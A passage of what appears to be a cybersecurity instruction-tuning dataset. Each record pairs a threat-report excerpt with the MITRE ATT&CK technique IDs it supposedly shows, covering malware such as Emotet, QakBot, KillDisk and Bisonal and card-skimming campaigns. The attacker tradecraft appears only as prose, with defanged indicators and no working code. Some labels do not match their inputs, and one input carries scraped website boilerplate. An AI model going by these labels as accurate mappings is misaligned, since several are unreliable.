is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After collecting the data in a central directory, the attackers then used either a renamed rar.exe or 7z.exe to archive the files. NICKEL also frequently used keyboard walks as a password for their archived data collections. The following are examples of RAR archiving for exfiltration", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Distributing the ransomware using spear-phishing and weaponized documents - Bat-files downloading payloads from Pastebin and inject them into a process on the operating system - Compromising RDP and usage of script files and password cracking tools to distribute over the victim\u2019s network - Compromise of Managed Service Providers and usage of their distribution software to spread the ransomware", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The button would then lead to the download a RAR archive named Adobe_Flash_Install.rar. This archive was designed to fool the targeted user into infected themselves with a Cobalt Strike implant. Details on the contents of this file are included later in this report", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service\u2014a reverse proxy software that creates secure tunnels\u2014to collect the stolen data", + "output": "- T1572: Protocol Tunneling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded content from a C&C server via an embedded iframe. At the same time, code embedded within this file also executed a PowerShell command to download and execute a copy of chfeeds.vbe from the C&C server", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In between then and now there has been a lot of rumour and debate about all aspects of this attack with many truths and mistruths being carried in public. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Clear all system event logs. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the \u201cattack surface\u201d by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. Potential attack scenario: When using this vulnerability the most likely attack vector used in this case is targeted emails containing legitimate looking PDF documents sent to high level employees", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed", + "output": "- T1204.001: User Execution - Malicious Link\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Aria-body starts with gathering data on the victim\u2019s machine, including: Host-name, computer-name, username, domain name, windows version, processor ~MHz, MachineGuid, 64bit or not, and public IP (using checkip.amazonaws.com", + "output": "- T1016: System Network Configuration Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once Shellex is called, it first passes each of the items in the config buffer to their own strings. Next, it creates a mutex using the filename and checks to see if the Service key for the service name exists. If so, it opens it using service manager. If not, it first saves a copy of itself to %Program Files (x86)%/DIFXE/svchost.exe. Next, it creates the service and runs it", + "output": "- T1012: Query Registry\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The wiper could be configured to use a file to overwrite the files on the disk using the \u2018F\u2019 configuration flag, as we saw images used to overwrite files in previous Shamoon attacks. This file would be stored in a resource named \u2018GRANT\u2019, but this particular wiper is not configured to use a file for overwriting so the GRANT resource does not exist. If it were configured to use a file, this sample would extract the file using the information listed in Table 5", + "output": "- T1561.002: Disk Wipe - Disk Structure Wipe" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This single hack of Volusion allows them to receive credit card data from 3,126 online shops. From the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to register the domains of the exfiltration server to be similar to the victims\u2019 domains. In this case, the domain of the exfiltration server is \u201cvolusion-cdn[.]com\u201d \u2014 very similar to the valid domain \u201ccdn3[.]volusion[.]com\u201d from Volusion. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the jQuery.ajax function to POST data to a remote server. Although the older skimmer is much simpler compared to the current one, it didn\u2019t encode the stolen data or store the data in sessionStorage before the exfiltration", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex. This registry key is empty upon the first execution of the payload. This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If none of the C2 servers respond and the end of the configured hosts list is reached, the modulo operation returns zero, thus host_index is equal to zero and the backdoor waits for the number of milliseconds stored in the <TimeLong> registry key. In our case, this was set to one minute. Then, it starts again and tries to reach the configured C2 servers, again host-by-host, until one response. If a connection to one of the configured C2 servers was set up successfully, the backdoor stays in the inner while loop (C2 control loop) and checks for commands every <TimeShort> number of milliseconds. C2_GetCommand_ComHandler handles the communication with the C2 server. It leverages the Windows WinHttp API similar to this Microsoft example and receives the C2 command along with its parameters. The adversaries use SSL/TLS to encrypt the C2 traffic", + "output": "- T1029: Scheduled Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the instances we have observed, the threat actor sent spear-phishing emails, luring the victims to open a malicious Microsoft Excel/Word document. The Word droppers were using standard VBA macros to download the payload. The actor tailored the decoy contents to the targeted victims, using logos and themes relevant to the targeted company or using trending topics from their region and, in one instance, even mimicking the Palestinian authority", + "output": "- T1566.001: Phishing - Spearphishing Attachment\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"m\"\": mode:\u00a0net\u00a0or\u00a0local. local\u00a0- encrypt local drives only and ignore network shares. h\"\": path to a file that contains specific hosts (names and IPs) to enumerate for shares. s\"\": IP address that the initial register message will be sent to\"", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The kill_unwanted function gets a list of running processes, compares each process with a encrypted list of \u201cunwanted\u201d programs. With our aforementioned breakpoint on the ei_str function, we can dump the decrypted strings, to ascertain the value of the \u201cunwanted\u201d programs", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1518.001: Software Discovery - Security Software Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload is a 32-bit executable file that is used to encrypt files on the victim\u2019s system to extort a ransom", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To make detection and analysis harder, QakBot encrypts its strings and decrypts them at runtime before use. Once the QakBot execution logic is finished using a string, it will immediately delete the string from memory. An example of this can be seen in Figure 6 below, which shows QakBot decrypting a string containing the value for lpProcName passed as a parameter to the GetProcAddress API call. The selected function, which has been labeled in IDA Pro as, \u201coc_clear_mem\u201d deletes the string memory right after it retrieves the process address", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "They routinely used standard tools that would mimic legitimate administrator activities. They relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools", + "output": "- T1021.004: Remote Services - SSH" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KillDisk\u2019s infection chain . How is it dropped in the system. This KillDisk variant looks like it is intentionally dropped by another process/attacker. The new KillDisk variant\u2019s parameter to shut down the affected machine . KillDisk also has a self-destruct process, although it isn\u2019t really deleting itself. Code snippets showing how KillDisk overwrites then deletes files . How does it wipe the disk. It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with \u201c0x00\u201d. It uses the information from the MBR to do further damage to the partitions it lists. KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes: This is done most likely to force a reboot or dupe the user into restarting the machine. Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Accept Cancel Continue Processing the data, please give it a few seconds", + "output": "- T1134: Access Token Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Bisonal used multiple lure documents to entice their victims to open and then be infected with Bisonal malware. Finally, in 2018, Ahnlab released a paper about \"\"Operation Bitter Biscuit\"\" where Bisonal was used against Korean and Japanese entities. This is an application document that has been used to provide a decoy to the Bisonal malware. The attacker also implemented a new order: execution of a command by using named pipe to get the output of the executed command. This mechanism allows the malware to execute API functions without ever using the Call instruction, making it difficult to perform the analysis. So that it ensures the thread has a chance to run, it will return the API call sleep() no matter what was originally requested. Office Extension . In 2019, the actor behind Bisonal used a new way to deploy the machine on the target's systems. The purpose of the malware is to deploy Bisonal on the infected system ($tmp$\\tmplogon.exe) and to create a Run registry key in order to execute Bisonal at the next reboot of the system. The attacker implements indirect API calls by using GetProcAddress() and LoadLibrary() API. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors\"", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NetPass.exe: a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: \"\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\"\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. On the left a sample from Bisonal 2014 and on the right Bisonal 2011\"", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We have seen Grandoreiro use DGA functions to generate a connection to a Google Sites page storing C2 information", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Due to its complex infection process that relies in part on registry updates with malware code, Valak can easily infect an unprotected Windows host. With ADS used to hide follow-up malware from a Valak infection, the risk is greatly increased", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This was probably done to avoid them being written to the file system", + "output": "- T1016: System Network Configuration Discovery\n- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Talos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This script\u00a0is meant to delete the Pony Loader after execution (works in a loop, in order to wait for the sample to terminate).\u00a0The same can be found in Pony 1.9 code", + "output": "- T1070.004: Indicator Removal - File Deletion\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Recently, a newer version was found in-the-wild, abusing NTFS Alternate Data Streams (ADS) in order to store the content of malicious payloads downloaded during execution. The main vector used by the group is sending malicious files in compressed format, attached to email. File types vary from VBS to LNK; the most recent campaign started to attach an HTML file which executes Javascript for downloading a malicious file", + "output": "- T1204.002: User Execution - Malicious File\n- T1059.005: Command and Scripting Interpreter - Visual Basic\n- T1564.004: Hide Artifacts - NTFS File Attributes" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attack starts with a malicious XLS attachment, sent in a phishing email, containing an obfuscated macro that downloads a heavily packed second-stage downloader. The second stage fetches the encrypted third-stage, which includes three layered encrypted Lokibot. After a privilege escalation, the third stage deploys Lokibot", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Naming conventions designed to blend into normal operations (e.g. amsc.exe, msvsvr.dll, alg.exe) - Dropping implants in folders named for legitimate software (e.g", + "output": "- T1036.004: Masquerading - Masquerade Task or Service\n- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The password-protected ZIP attachments contain a Microsoft Word document with macros to install malware. See Appendix A for examples of these Word documents from June 2020. Prior to April 2020, the most common malware caused by Word documents associated with Shathak/TA551 was Ursnif. Since April 2020, the most common malware distributed by these Word documents has been Valak. Appendix C lists a series of Valak DLL examples from June 2020", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The 